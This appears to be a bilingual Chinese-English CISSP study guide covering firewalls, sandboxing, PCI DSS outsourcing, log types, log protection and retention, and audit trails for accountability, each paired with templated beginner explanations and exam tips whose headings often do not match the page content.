应用防火墙控制通往或来自特定应用程序或服务的流量。 例如,Web应用防火 墙(WAF)是一种专用的应用防火墙,用于保护Web服务器。 它检查所有发 往Web服务器的流量,并可以阻止恶意流量,例如SQL注入攻击和跨站脚本 (XSS)攻击。 这可能需要大量处理器资源,因此WAF仅过滤发往Web服务 器的流量,而非所有网络流量。 一种 下一代防火墙(NGFW) 充当 统一威胁管理(UTM) 设备,并结合了 多种过滤功能。 它包括防火墙的传统功能,如数据包过滤和状态检测。 然而, NGFW 能够执行数据包检查技术,从而识别并阻止恶意流量。 它可以通过定 义文件以及白名单和黑名单来过滤恶意软件。 它还包含入侵检测和/或入侵防 御功能。 沙箱 沙箱 是一种虚拟化技术,为应用程序提供安全边界,防止应用程序与其他应用 程序交互。 反恶意软件应用程序使用沙箱技术来测试未知应用程序。 如果应用 程序表现出可疑特征,沙箱技术将阻止该应用程序感染其他应用程序或操作系 统。 应用程序开发人员通常使用虚拟化技术来测试应用程序。 他们创建一个虚拟机, 然后将其与主机机器和网络隔离。

随后,他们可以在这种沙箱环境中测试应用 程序,而不会影响虚拟机外部的任何内容。 类似地,许多反恶意软件厂商也使 用虚拟化作为沙箱技术,以观察恶意软件的行为。 第三方安全服务 一些组织将安全服务外包给第三方,即组织外部的个人或组织。 这可以包括 多种不同类型的服务,例如审计和渗透测试。 在某些情况下,组织必须向外部实体保证第三方服务提供商遵守特定的安全要 求。 例如,处理主要信用卡交易的组织必须遵守支付卡行业数据安全标准( PCI DSS)。 这些组织通常会外包部分服务,而PCI DSS

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

审计:审计记录主体行为,用于追责、复盘和取证。

安全边界:安全边界是不同信任级别或安全要求交接的位置。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

没有日志和身份绑定,就很难问责。

内网/外网、DMZ/内网、不同分类级别之间都是常见边界。

ISO 偏标准和管理体系。

信用卡/持卡人数据场景优先想到 PCI DSS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
审计 审计记录主体行为,用于追责、复盘和取证。
安全边界 安全边界是不同信任级别或安全要求交接的位置。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 46 / PDF P1183

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

requires organizations to ensure that service providers also comply with PCI DSS requirements. In other words, PCI DSS doesn't allow organizations to outsource their responsibilities. Some software-as-a-service (SaaS) vendors provide security services via the cloud. This can include cloud-based solutions similar to next-generation firewalls, UTM devices, and email gateways for spam and malware filtering. Logging and Monitoring Logging and monitoring procedures help an organization prevent incidents and provide an effective response when they occur. Logging records events into various logs, and monitoring reviews these events.

Combined, they allow an organization to track, record, and review activity, providing overall accountability. This helps an organization detect undesirable events that can negatively affect confidentiality, integrity, and system availability. It is also useful in reconstructing activity after an event has occurred to identify what happened and sometimes to prosecute those responsible for the activity. The following sections cover common logging and monitoring topics. Logging Techniques Logging is the process of recording information about events to a log file or database. Logging captures events, changes, messages, and other data describing activities on a system.

Logs will commonly record details such as what happened, when it happened, where it happened, who did it, and sometimes how it happened. When you need to find information about an incident that occurred in the recent past, logs are a good place to start. For example, Figure 17.5 shows Event Viewer on a Microsoft Windows system with a Security log entry selected and expanded. This log entry shows that a user named Darril accessed a file named PayrollData (Confidential).xlsx located in a folder named C:\Payroll. It shows that the user accessed the file at 4:30 p.m. on January 21, 2024.

As long as the identification and authentication processes are secure, this is enough to hold Darril accountable for accessing the file. On the other hand, if the organization doesn't use secure authentication processes, and it's easy for someone to impersonate another user, Darril may be wrongly accused. This

中文直译 / 整理

要求组织确保服务提供商也遵守PCI DSS的要求。 换句话说,PCI DSS不允许 组织外包其责任。 一些软件即服务(SaaS)供应商通过云提供安全服务。 这可以包括类似于下一代防火 墙、UTM设备以及用于垃圾邮件和恶意软件过滤的电子邮件网关的云解决方案。 日志记录和监控 日志记录和监控程序有助于组织预防事件,并在事件发生时提供有效的应对措 施。 日志记录将事件记录到各种日志中,而监控则审查这些事件。 两者结合, 使组织能够跟踪、记录和审查活动,从而实现整体问责。 这有助于组织检测可能对机密性、完整性和系统可用性产生负面影响的不良事 件。 在事件发生后,它还用于重建活动,以确定发生了什么,有时甚至用于起 诉相关责任人。 以下部分将介绍常见的日志记录和监控主题。 日志记录技术 日志记录是将有关事件的信息记录到日志文件或数据库中的过程。 日志记录 捕获事件、更改、消息以及其他描述系统活动的数据。 日志通常会记录诸如 发生了什么、何时发生、何处发生、谁造成的,有时还包括如何发生等详细 信息。 当您需要查找近期发生的事件相关信息时,日志是很好的起点。

例如,图 17.5显示了在 Microsoft Windows 系统上选中并展开的安全日志条目 的事件查看器。 此日志条目显示,名为 Darril 的用户访问了一个名为PayrollData (机密).xlsx,该文件位于名为 C:\Payroll 的文件夹中。 日志显示,该用户于 2024 年 1 月 21 日下午 4:30 访问了该文件。 只要身份识别和身份验证过程是安全的,这就足以让达里尔对访问文件负责。 另一方面,如果组织未使用安全的身份验证过程,且他人容易冒充其他用户, 达里尔可能会被错误指控。 这

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

认证:认证是验证“你是不是你声称的那个人”。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

密码、令牌、生物特征、多因素认证都服务认证。

问责依赖识别、认证、授权、审计和记账共同工作。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
认证 认证是验证“你是不是你声称的那个人”。
问责性 问责性要求能把行为绑定到具体主体。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
学习单元 47 / PDF P1184

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

reinforces the requirement for secure identification and authentication practices as a prerequisite for accountability. FIGURE 17.5 Viewing a log entry Logs are often referred to as audit logs, and logging is often called audit logging. However, it's important to realize that auditing (described in Chapter 15, “Security Assessment and Testing”) is more than just logging. Logging will record events, and auditing examines or inspects an environment for compliance. Common Log Types There are many different types of logs.

The following is a short list of common logs available within an IT environment: Security Logs Security logs record access to resources such as files, folders, printers, and so on. For example, they can record when a user accessed, modified, or deleted a file, as shown earlier in Figure 17.5. Many systems automatically record access to key system files but require an administrator to enable auditing on other resources before logging access. For

中文直译 / 整理

强化了将安全的身份识别和身份验证实践作为问责前提的要求。 图 17.5 查看日志条目 日志通常被称为审计日志,而日志记录常被称为审计日志记录。 然而, 重要的是要认识到审计(参见第 15 章,“安全评估与测试”)不仅仅是 日志记录。 日志记录将记录事件,而审计则检查或审查环境以确保合规性。 常见日志类型 日志有多种不同类型。 以下是 IT 环境中常见的日志类型简要列表: 安全日志安全日志记录对文件、文件夹、打印机等资源的访问。 例如,它们可 以记录用户何时访问、修改或删除了文件,如前文所示的图17.5。 许多系统会 自动记录对关键系统文件的访问,但需要管理员在其他资源上启用审核后才能 记录访问情况。 对于

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
身份 身份是主体在系统中的标识。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 48 / PDF P1185

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

example, administrators might configure logging for proprietary data but not for public data posted on a website. System Logs System logs record system events such as when a system starts or stops, when services start or stop, or when service attributes are modified. If attackers are able to shut down a system and reboot it with a CD or USB flash drive, they can steal data from the system without any record of the data access. Similarly, if attackers are able to stop a service that is monitoring the system, they may be able to access the system without the logs recording their actions. Additionally, attackers sometimes modify the attributes of logs.

For example, a service might be set to Disabled, but the attacker can change it to Manual, allowing the attacker to start it at will. Logs that detect when systems reboot, or when services stop or are modified, can help administrators discover potentially malicious activity. Application Logs These logs record information for specific applications. Application developers choose what to record in the application logs. For example, a database developer can choose to record when anyone accesses specific data objects such as tables or views. Firewall Logs Firewall logs can record events related to any traffic that reaches a firewall.

This includes traffic that the firewall allows and traffic that the firewall blocks. These logs commonly log key packet information such as source and destination IP addresses and source and destination ports but not the packets’ actual contents. Proxy Logs Proxy servers improve internet access performance for users and can control what websites users can visit. Proxy logs include the ability to record details such as what sites specific users visit and how much time they spend on these sites. They can also record when users attempt to visit known prohibited sites.

Change Logs Change logs record change requests, approvals, and actual changes to a system as a part of an overall change management process. A change log can be manually created or created from an internal web page as personnel record activity related to a change. Change logs are useful to track approved changes. They can also be helpful as part of a disaster recovery program. For example, administrators and technicians can use change logs to return a system to its last known state after a disaster. This will include all previously applied changes. Logging is usually a native feature in an operating system and for most applications and services, which makes it easy for administrators and

中文直译 / 整理

示例,管理员可能会为专有数据配置日志记录,但不会为发布在网站上的公共数据 配置日志记录。 系统日志 系统日志记录系统事件,例如系统启动或停止、服务启动或停止,或 服务属性被修改。 如果攻击者能够关闭系统并使用CD或USB闪存驱动器重新启 动,他们可以在不留下任何数据访问记录的情况下窃取系统数据。 同样,如果攻 击者能够停止监控系统的服务,他们可能在不被日志记录的情况下访问系统。 此 外,攻击者有时会修改日志的属性。 例如,某个服务可能被设置为“已禁用”, 但攻击者可以将其更改为“手动”,从而随时启动该服务。 能够检测系统重启、 服务停止或被修改的日志,可帮助管理员发现潜在的恶意活动。 应用程序日志 这些日志记录特定应用程序的信息。 应用程序开发人员自行决定 在应用程序日志中记录哪些内容。 例如,数据库开发人员可以选择记录任何人访 问特定数据对象(如表或视图)的时间。 防火墙日志 防火墙日志可以记录任何到达防火墙的流量相关事件,包括防火墙 允许和阻止的流量。 这些日志通常记录关键的数据包信息,例如源和目标IP地 址以及源和目标端口,但不记录数据包的实际内容。

代理日志 代理服务器可提升用户的互联网访问性能,并能控制用户可访问的网站。 代理日志能够记录特定用户访问的网站详情以及他们在这些网站上花费的时间。 它们还可以记录用户尝试访问已知禁止网站的时间。 变更日志 变更日志作为整体变更管理流程的一部分,记录变更请求、批准以及 对系统的实际变更。 变更日志可手动创建,也可通过内部网页由工作人员记录与 变更相关的活动来生成。 变更日志有助于跟踪已批准的变更,也可作为灾难恢复 计划的一部分提供帮助。 例如,管理员和技术人员可利用变更日志在灾难发生后 将系统恢复至最后一个已知状态,其中包含所有先前应用的变更。 日志记录通常是操作系统以及大多数应用程序和服务的内置功能,这使得管 理员和

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 49 / PDF P1186

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

technicians to configure a system to record specific types of events. Events from privileged accounts, such as Administrator and root user accounts, should be included in any logging plan. Doing so helps deter attacks from a malicious insider and will document activity for prosecution if necessary. Protecting Log Data Personnel within the organization can use logs to re-create events leading up to and during an incident, but only if the logs haven't been modified. If attackers can modify the logs, they can erase their activity, effectively nullifying the value of the data. The files may no longer include accurate information and may not be admissible as evidence to prosecute attackers.

With this in mind, it's important to protect log files against unauthorized access and unauthorized modification. It's common to store copies of logs on a central system, such as a security information and event management (SIEM) system, to protect it. Even if an attacker modifies or corrupts the original files, personnel can still use the copy to view the events. One way to protect log files is by assigning permissions to limit their access. Organizations often have strict policies mandating backups of log files. Additionally, these policies define retention times. For example, organizations might keep archived log files for a year, three years, or any other length of time.

Some government regulations require organizations to keep archived logs indefinitely. Security controls such as setting logs to readonly, assigning permissions, and implementing physical security controls protect archived logs from unauthorized access and modifications. It's important to destroy logs when they are no longer needed. Keeping unnecessary logs can cause excessive labor costs if the organization experiences legal issues. For example, if regulations require an organization to keep logs for one year but the organization has 10 years of logs, a court order can force personnel to retrieve relevant data from these 10 years of logs.

In contrast, if the organization keeps only one year of logs, personnel need only search a year's worth of logs, which will take significantly less time and effort.

中文直译 / 整理

技术人员能够配置系统以记录特定类型的事件。 特权账户(如管理员和 root 用户账户)的事件应包含在任何日志记录计划中。 这样做有助于阻止恶 意内部人员的攻击,并在必要时为起诉记录活动。 保护日志数据 组织内部人员可以使用日志来重建事件发生前及事件期间的过程,但前提是日 志未被修改。 如果攻击者能够修改日志,他们就可以删除其活动痕迹,从而使 数据的价值归零。 这些文件可能不再包含准确的信息,也可能无法作为起诉攻 击者的证据。 因此,保护日志文件免受未经授权的访问和修改至关重要。 通常会将日志副本存储在中央系统(例如安全信息和事件管理(SIEM)系统) 上以进行保护。 即使攻击者修改或破坏了原始文件,人员仍可使用副本查看 事件记录。 保护日志文件的一种方法是通过设置权限来限制其访问。 组织通常有严格的规定,要求对日志文件进行备份。 此外,这些规定还定义了 保留期限。 例如,组织可能会将归档日志文件保留一年、三年或任何其他时长。 某些政府法规要求组织无限期保留归档日志。 通过将日志设置为只读、分配权 限以及实施物理安全控制等安全措施,可以保护归档日志免受未经授权的访问 和修改。 当日志不再需要时,及时销毁它们非常重要。

保留不必要的日志可能会在组织遭遇法律问题时导致过高的劳动力成本。 例如,如果法规要求组织保留一年的日志,但组织却保存了十年的日志,法 院命令可能迫使人员从这十年的日志中检索相关数据。 相反,如果组织仅保 留一年的日志,人员只需搜索一年份的日志,这将显著减少时间和精力。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

保留期限:保留期限规定数据、日志或记录要保存多久。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

保留太短会影响合规和取证,保留太久会增加泄露风险和成本。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
保留期限 保留期限规定数据、日志或记录要保存多久。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 50 / PDF P1187

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

NIST publishes a significant amount of information on IT security, including Federal Information Processing Standards (FIPS) publications. The Minimum Security Requirements for Federal Information and Information Systems (FIPS 200) specifies the following as the minimum security requirements for audit data: Create, protect, and retain information system audit records to the extent needed to enable the monitoring, analysis, investigation, and reporting of unlawful, unauthorized, or inappropriate information system activity. Ensure that the actions of individual information system users can be uniquely traced to those users so they can be held accountable for their actions.

You'll find it useful to review NIST documents when preparing for the CISSP exam to give you a broader idea of different security concepts. They are freely available, and you can access them here: http://csrc.nist.gov. You can download the FIPS 200 document here: http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.200.pdf. The Role of Monitoring Monitoring provides several benefits for an organization, including increasing accountability, help with investigations, and basic troubleshooting. The following sections describe these benefits in more depth. Audit Trails Audit trails are records created when information about events and occurrences is stored in one or more databases or log files.

They provide a record of system activity and can reconstruct activity leading up to and during security events. Security professionals extract information about an incident from an audit trail to prove or disprove culpability, and much more. Audit trails allow security professionals to examine and trace events in forward or reverse order. This flexibility helps when tracking down problems, performance issues, attacks, intrusions, security breaches, coding errors, and other potential policy violations. NIST

中文直译 / 整理

发布了大量关于 IT 安全的信息,包括联邦信息处理标准(FIPS)出版 物。 《联邦信息和信息系统最低安全要求》(FIPS 200)规定了审计数据的最 低安全要求如下: 创建、保护和保留信息系统审计记录,以满足监控、分析、调查和报告非 法、未经授权或不当信息系统活动的需要。 确保单个信息系统用户的操作能够唯一地追溯到这些用户,以便对其行 为负责。 在准备CISSP考试时,查阅NIST文档将有助于您更全面地了解不同 的安全概念。 这些文档可免费获取,您可通过以下链接访问: http://csrc.nist.gov。 您可通过以下链接下载FIPS 200文档: http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.200.pdf。 监控的作用 监控为组织带来多项益处,包括增强问责性、协助调查以及基本故障排除。 以 下章节将更深入地描述这些益处。 审计追踪 审计跟踪是当有关事件和发生情况的信息被存储在一个或多个数据库或日志文 件中时创建的记录。 它们提供了系统活动的记录,并可重建安全事件发生前及 发生期间的活动。

安全专业人员从审计跟踪中提取有关事件的信息,以证明或 否认责任,以及其他更多内容。 审计跟踪允许安全专业人员按正向或逆向顺序 检查和追踪事件。 这种灵活性有助于排查问题, 性能问题、攻击、入侵、安全漏洞、编码错误以及其他潜在的政策违规行为。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

NIST:NIST 提供美国常用安全标准、框架和指南。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 51 / PDF P1188

第 1188 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Audit trails provide a comprehensive record of system activity and can help detect a wide variety of security violations, software flaws, and performance problems. Using audit trails is a passive form of detection security control. They serve as a deterrent in the same manner that closed-circuit television (CCTV) or security guards do. If personnel know they are being watched and their activities are being recorded, they are less likely to engage in illegal, unauthorized, or malicious activity—at least in theory. Some criminals are too careless or clueless for this to apply consistently.

However, more and more advanced attackers take the time to locate and delete logs that might have recorded their activity. This has become a standard practice with many advanced persistent threats (APTs). Audit trails are also essential as evidence in the prosecution of criminals. They provide a before-and-after picture of the state of resources, systems, and assets. This, in turn, helps determine whether a change or alteration was caused by a user action, the operating system, a software application, or some other source, such as hardware failure. Because data in audit trails can be so valuable, it is important to ensure that the logs are protected to prevent modification or deletion.

Monitoring and Accountability Monitoring is necessary to ensure that subjects (such as users and employees) can be held accountable for their actions and activities. Users claim an identity (such as with a username) and prove their identity (by authenticating), and audit trails record their activity while they are logged in. Monitoring and reviewing the audit trail logs provide accountability for these users. It is possible to promote positive user behavior and compliance with the organization's security policy by monitoring activity.

Users who are aware that logs are recording their IT activities are less likely to try to circumvent security controls or perform unauthorized or restricted activities. Once a security policy violation or a breach occurs, the source of that violation should be determined. If it is possible to identify the individuals responsible, they should be held accountable based on the organization's

中文直译 / 整理

审计跟踪提供了系统活动的全面记录,有助于发现各种安全违规、软 件缺陷和性能问题。 使用审计追踪是一种被动的检测安全控制措施。 它们的作用类似于闭路电视 (CCTV)或保安人员,起到威慑作用。 如果工作人员知道他们正在被监视, 且其活动已被记录,他们就不太可能从事非法、未经授权或恶意的活动——至 少理论上如此。 然而,一些罪犯过于粗心或无知,导致这一原则无法始终适用。 然而,越来越多的高级攻击者会花时间定位并删除可能记录其活动的日志。 这 已成为许多高级持续性威胁(APTs)的标准做法。 审计追踪在起诉罪犯时也是至关重要的证据。 它们提供了资源、系统和资产状 态的前后对比图。 这有助于确定变更或篡改是由用户操作、操作系统、软件应 用程序,还是其他来源(如硬件故障)引起的。 由于审计追踪中的数据可能极 具价值,因此必须确保日志受到保护,以防止被修改或删除。 监控与问责 监控对于确保主体(如用户和员工)对其行为和活动负责是必要的。 用户声明 身份(例如使用用户名)并通过身份验证来证明其身份,审计跟踪记录他们在 登录期间的活动。 通过监控和审查审计跟踪日志,可以实现对这些用户的问责。

通过监控活动,可以促进积极的用户行为并确保遵守组织的安全策略。 意识到 其IT活动已被记录的用户,更不可能试图规避安全控制或执行未经授权或受限 的活动。 一旦发生安全策略违规或泄露事件,应确定该违规行为的来源。 如果能够 识别出责任人,应根据组织的

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

审计:审计记录主体行为,用于追责、复盘和取证。

问责性:问责性要求能把行为绑定到具体主体。

政策:政策是高层原则,说明必须遵守什么。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1188 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

没有日志和身份绑定,就很难问责。

问责依赖识别、认证、授权、审计和记账共同工作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Minimum level、mandatory requirement 常对应 standard。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
审计 审计记录主体行为,用于追责、复盘和取证。
问责性 问责性要求能把行为绑定到具体主体。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 52 / PDF P1189

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

